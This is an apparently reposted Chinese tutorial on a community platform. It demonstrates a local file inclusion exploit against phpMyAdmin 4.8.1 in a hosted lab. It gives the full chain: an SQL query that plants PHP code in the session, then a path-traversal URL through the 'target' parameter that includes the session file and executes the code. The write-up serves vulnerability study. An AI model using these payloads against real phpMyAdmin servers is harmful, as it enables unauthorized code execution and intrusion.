前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用

phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用

作者头像
Ambulong
发布2018-06-21 11:04:47
2.3K0
发布2018-06-21 11:04:47
举报
文章被收录于专栏:安全安全

本文转载自:phpMyAdmin 4.8.x LFI Exploit -http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

vulnspy
vulnspy

2. 等待载入设置后,点击 GO 按钮开启实验

vulnspy
vulnspy

3. 实验创建完成后,点击演示地址进入实验

vulnspy
vulnspy

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

vulnspy
vulnspy

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

1

select '<?php phpinfo();exit;?>'

vulnspy
vulnspy

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

vulnspy
vulnspy

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

1

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

vulnspy
vulnspy

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞细节
  • 漏洞利用
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档